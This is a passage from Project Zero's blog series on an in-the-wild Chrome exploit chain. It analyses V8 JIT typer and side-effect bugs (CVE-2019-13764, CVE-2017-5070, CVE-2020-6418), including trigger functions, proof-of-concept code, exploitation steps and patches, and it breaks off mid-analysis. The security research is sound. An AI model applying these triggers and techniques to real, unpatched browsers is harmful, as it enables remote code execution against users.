This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.

At Project Zero we often refer to our goal simply as “make 0-day hard”. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn’t stray too far from the current state of the art. One of our efforts in this regard is the tracking of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be a gap in the security community’s ability to detect 0-day exploits.

Therefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor.

We discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.

Flowchart showing the exploit chain from affected websites, to exploit servers, to Chrome renderers, to Android or Windows privesc, and finally implants.

From the exploit servers, we have extracted:

  • Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.
  • Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.
  • A “privilege escalation kit” composed of publicly known n-day exploits for older versions of Android.

The four 0-days discovered in these chains have been fixed by the appropriate vendors:

  • CVE-2020-6418 - Chrome Vulnerability in TurboFan (fixed February 2020)
  • CVE-2020-0938 - Font Vulnerability on Windows (fixed April 2020)
  • CVE-2020-1020 - Font Vulnerability on Windows (fixed April 2020)
  • CVE-2020-1027 - Windows CSRSS Vulnerability (fixed April 2020)

We understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end users device, before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the "fast" or "slow" exploitation paths.

The Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.

The posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:

  • Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,
  • A deep look into the bug class of one of the Chrome exploits, and
  • An in-depth teardown of the Android post-exploitation code.

In addition, we are posting root cause analyses for each of the four 0-days discovered as a part of these exploit chains.

Exploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.

We recommend reading the posts in the following order:

  1. Introduction (this post)
  2. Chrome: Infinity Bug
  3. Chrome Exploits
  4. Android Exploits
  5. Android Post-Exploitation
  6. Windows Exploits

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 2: Chrome Infinity Bug.

In-the-Wild Series: Chrome Infinity Bug

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.

Brief introduction to typer bugs

One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.

For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:

a = Math.min(a, 1);

if (a > 2) {

  return 3;


Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:

a = vuln(a);

let array = [1, 2, 3];

return array[a];

If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that at a certain optimization phase, can be expressed by the following pseudocode:

if (a >= array.length) {



let elements = array.[[elements]];

return elements.get(a);

get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.

The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.

A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:

a = vuln(a); // predicted = false; actual = true

a = a * 10;  // predicted = 0; actual = 10

let array = [1, 2, 3];

return array[a];

Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.

At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.

Induction variable analysis

The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:

Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {


  // We only handle integer induction variables (otherwise ranges

  // do not apply and we cannot do anything).

  if (!initial_type.Is(typer_->cache_->kInteger) ||

      !increment_type.Is(typer_->cache_->kInteger)) {

    // Fallback to normal phi typing, but ensure monotonicity.

    // (Unfortunately, without baking in the previous type,

    // monotonicity might be violated because we might not yet have

    // retyped the incrementing operation even though the increment's

    // type might been already reflected in the induction variable

    // phi.)

    Type type = NodeProperties::IsTyped(node)

                    ? NodeProperties::GetType(node)

                    : Type::None();

    for (int i = 0; i < arity; ++i) {

      type = Type::Union(type, Operand(node, i), zone());


    return type;


  // If we do not have enough type information for the initial value

  // or the increment, just return the initial value's type.

  if (initial_type.IsNone() ||

      increment_type.Is(typer_->cache_->kSingletonZero)) {

    return initial_type;



  InductionVariable::ArithmeticType arithmetic_type =


  double min = -V8_INFINITY;

  double max = V8_INFINITY;

  double increment_min;

  double increment_max;

  if (arithmetic_type ==

      InductionVariable::ArithmeticType::kAddition) {

    increment_min = increment_type.Min();

    increment_max = increment_type.Max();

  } else {



    increment_min = -increment_type.Max();

    increment_max = -increment_type.Min();


  if (increment_min >= 0) {

    // increasing sequence

    min = initial_type.Min();

    for (auto bound : induction_var->upper_bounds()) {

      Type bound_type = TypeOrNone(bound.bound);

      // If the type is not an integer, just skip the bound.

      if (!bound_type.Is(typer_->cache_->kInteger)) continue;

      // If the type is not inhabited, then we can take the initial

      // value.

      if (bound_type.IsNone()) {

        max = initial_type.Max();



      double bound_max = bound_type.Max();

      if (bound.kind == InductionVariable::kStrict) {

        bound_max -= 1;


      max = std::min(max, bound_max + increment_max);


    // The upper bound must be at least the initial value's upper

    // bound.

    max = std::max(max, initial_type.Max());

  } else if (increment_max <= 0) {

    // decreasing sequence


  } else {

    // Shortcut: If the increment can be both positive and negative,

    // the variable can go arbitrarily far, so just return integer.

    return typer_->cache_->kInteger;



  return Type::Range(min, max, typer_->zone());


Now, imagine the compiler processing the following JavaScript code:

for (var i = initial; i < bound; i += increment) { [...] }

In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.

Note that the algorithm only works with integers, otherwise a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type holds two unusual properties that have made the vulnerability possible:

  • +Infinity and -Infinity belong to it, whereas NaN and -0 don’t.
  • The type is not closed under addition, i.e., adding two integers doesn’t always result in an integer. Namely, +Infinity + -Infinity yields NaN.

Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:

for (var i = -Infinity; i < 0; i += Infinity) { }

This one line is enough to trigger the issue. The exploit author has had to make only two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:

function trigger(argument) {

  var j = 0;

  var increment = 100;

  if (argument > 2) {

    increment = Infinity;


  for (var i = -Infinity; i <= -Infinity; i += increment) {


    if (j == 20) {





The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.


The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors. For the ease of the reader, we've modified it to be compatible with x64 as well.


  // The comments display the current value of the variable i, the type

  // inferred by the compiler, and the machine type used to store

  // the value at each step.

  // Initially:

  // actual = NaN, inferred = (-Infinity, +Infinity)

  // representation = double

  i = Math.max(i, 0x100000800);

  // After step one:

  // actual = NaN, inferred = [0x100000800; +Infinity)

  // representation = double

  i = Math.min(0x100000801, i);

  // After step two:

  // actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]

  // representation = int64_t

  i -= 0x1000007fa;

  // After step three:

  // actual = -2042, inferred = [6, 7]

  // representation = int32_t

  i >>= 1;

  // After step four:

  // actual = -1021, inferred = 3

  // representation = int32_t

  i += 10;

  // After step five:

  // actual = -1011, inferred = 13

  // representation = int32_t


The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.

Reduction ConstantFoldingReducer::Reduce(Node* node) {

  DisallowHeapAccess no_heap_access;

  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&

      node->op()->HasProperty(Operator::kEliminatable) &&

      node->opcode() != IrOpcode::kFinishRegion) {

    Node* constant = TryGetConstant(jsgraph(), node);

    if (constant != nullptr) {

      ReplaceWithValue(node, constant);

      return Replace(constant);


If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore not marked as eliminable.

Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:

Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {


} else if (arity == 1) {

  Node* length = NodeProperties::GetValueInput(node, 2);

  Type length_type = NodeProperties::GetType(length);

  if (!length_type.Maybe(Type::Number())) {

    // Handle the single argument case, where we know that the value

    // cannot be a valid Array length.

    elements_kind = GetMoreGeneralElementsKind(

        elements_kind, IsHoleyElementsKind(elements_kind)

                           ? HOLEY_ELEMENTS

                           : PACKED_ELEMENTS);

    return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,

                          elements_kind, allocation,



  if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&

      length_type.Max() <= kElementLoopUnrollLimit &&

      length_type.Min() == length_type.Max()) {

    int capacity = static_cast<int>(length_type.Max());

    return ReduceNewArray(node, length, capacity, *initial_map,

                          elements_kind, allocation,



When the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding the function keeps using the original argument node. The folded value is employed during initialization of the backing store while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with the negative length and backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the сrafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.

The rest of the trigger function is provided below:


  corrupted_array = Array(i);

  corrupted_array[0] = 1.1;

  ptr_leak_array = [wasm_module, array_buffer, [...],

                    wasm_module, array_buffer]; 

  extra_array = [13.37, [...], 13.37, 1.234]; 

  return [corrupted_array, ptr_leak_array, extra_array];


The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.

From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:

  1. Locate the required pointers and object fields through pattern-matching.
  2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.
  3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.
  4. Overwrite the body of a WebAssembly function inside the page with the attacker’s payload.
  5. Finally, execute it.

The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.

Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.

Patch 1

Even though there’s evidence this vulnerability has been originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:

function write(begin, end, step) {

  for (var i = begin; i >= end; i += step) {

    step = end - begin;

    begin >>>= 805306382;



var buffer = new ArrayBuffer(16384);

var view = new Uint32Array(buffer);

for (let i = 0; i < 10000; i++) {

  write(Infinity, 1, view[65536], 1);


As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").

Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers, however, after an internal discussion, the V8 team raised the severity rating to high.

In the light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:


const bool both_types_integer =

    initial_type.Is(typer_->cache_->kInteger) &&


bool maybe_nan = false;

// The addition or subtraction could still produce a NaN, if the integer

// ranges touch infinity.

if (both_types_integer) {

  Type resultant_type =

      (arithmetic_type == InductionVariable::ArithmeticType::kAddition)

          ? typer_->operation_typer()->NumberAdd(initial_type,


          : typer_->operation_typer()->NumberSubtract(initial_type,


  maybe_nan = resultant_type.Maybe(Type::NaN());


// We only handle integer induction variables (otherwise ranges

// do not apply and we cannot do anything).

if (!both_types_integer || maybe_nan) {


The code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but demonstrated in the proof of concept sent to Chrome. The typer takes into account these changes and reflects them in increment’s computed type. Therefore, the attacker can, for example, add negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:

var increment = -Infinity;

var k = 0;

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    increment = +Infinity;


  if (++k > 10) {




Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in trigger.

Patch 2

The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.


// If we do not have enough type information for the initial value or

// the increment, just return the initial value's type.

if (initial_type.IsNone() ||

    increment_type.Is(typer_->cache_->kSingletonZero)) {

  return initial_type;


// We only handle integer induction variables (otherwise ranges do not

// apply and we cannot do anything). Moreover, we don't support infinities

// in {increment_type} because the induction variable can become NaN

// through addition/subtraction of opposing infinities.

if (!initial_type.Is(typer_->cache_->kInteger) ||

    !increment_type.Is(typer_->cache_->kInteger) ||

    increment_type.Min() == -V8_INFINITY ||

    increment_type.Max() == +V8_INFINITY) {


Additionally, ReduceJSCreateArray was updated to always use the same value for both the  length property and backing store capacity, thus rendering the reported exploitation technique useless.

Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:
















As a result, the patched function provides us with an even wider choice of possible “type confusions”.

It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found this excellent blog post written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.

We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.

Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:

function trigger(arg) {

  // Initially:

  // actual = 1, inferred = any

  var k = 0;


  arg = arg | 0;

  // After step one:

  // actual = 1, inferred = [-0x80000000, 0x7fffffff]


  arg = Math.min(arg, 2);

  // After step two:

  // actual = 1, inferred = [-0x80000000, 2]


  arg = Math.max(arg, 1);

  // After step three:

  // actual = 1, inferred = [1, 2]


  if (arg == 1) {

    arg = "30";


  // After step four:

  // actual = string{30}, inferred = [1, 2] or string{30}


  for (var i = arg; i < 0x1000; i -= 0) {

    if (++k > 1) {




  // After step five:

  // actual = number{30}, inferred = [1, 2] or string{30}


  i += 1;

  // After step six:

  // actual = 31, inferred = [2, 3]


  i >>= 1;

  // After step seven:

  // actual = 15, inferred = 1


  i += 2;

  // After step eight:

  // actual = 17, inferred = 3


  i >>= 1;

  // After step nine:

  // actual = 8, inferred = 1

  var array = [0.1, 0.1, 0.1, 0.1];

  return [array[i], array];


The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.

Patch 3

Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:

  • Extended element access hardening, which now prevents the abuse of NumberLessThan nodes.
  • Discovered and fixed a similar problem with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.
  • Implemented a verifier for induction variables that validates the computed type against the more conservative regular phi typing.

Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.


This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and, quite often even the slightest issue in the typer is enough to build a powerful and reliable exploit.

Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in the class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.

In-the-Wild Series: Chrome Exploits

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero


As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.

A timeline chart depicting the extracted exploits and affected browser versions.

All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.

The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.

1. CVE-2017-5070

The vulnerability

This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:

global_array = [, 1.1];


function trigger(local_array) {

  var temp = global_array[0];

  local_array[1] = {};

  return global_array[1];



trigger([, {}]);

trigger([, 1.1]);


for (var i = 0; i < 10000; i++) {

  trigger([, {}]);




The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.

The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.

The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made made the alias analyser use the constant comparison only when both arguments are constants:

 HAliasing Query(HValue* a, HValue* b) {


     // Constant objects can be distinguished statically.

-    if (a->IsConstant()) {

+    if (a->IsConstant() && b->IsConstant()) {

       return a->Equals(b) ? kMustAlias : kNoAlias;


     return kMayAlias;

Exploit 1

The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.

The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.

The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.

The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.

However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.

Exploit 2

The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.

The general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.

While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public proof-of-concept.

2. CVE-2020-6418

The vulnerability

This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:

'use strict';

(function() {

  var popped;


  function trigger(new_target) {

    function inner(new_target) {

      function constructor() {

        popped =;


      var temp = array[0];

      return Reflect.construct(constructor, arguments, new_target);






  var array = new Array(0, 0, 0, 0, 0);


  for (var i = 0; i < 20000; i++) {

    trigger(function() { });




  var proxy = new Proxy(Object, {

    get: () => (array[4] = 1.1, Object.prototype)






A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.

Note that the attacker can’t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.

This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:

InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(


  InferReceiverMapsResult result = kReliableReceiverMaps;


    case IrOpcode::kJSCreate: {

      if (IsSame(receiver, effect)) {

        base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);

        if (initial_map.has_value()) {

          *maps_return = ZoneHandleSet<Map>(initial_map->object());

          return result;


        // We reached the allocation of the {receiver}.

        return kNoReceiverMaps;


+     result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.




The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.

Exploit 1

This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.

The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.

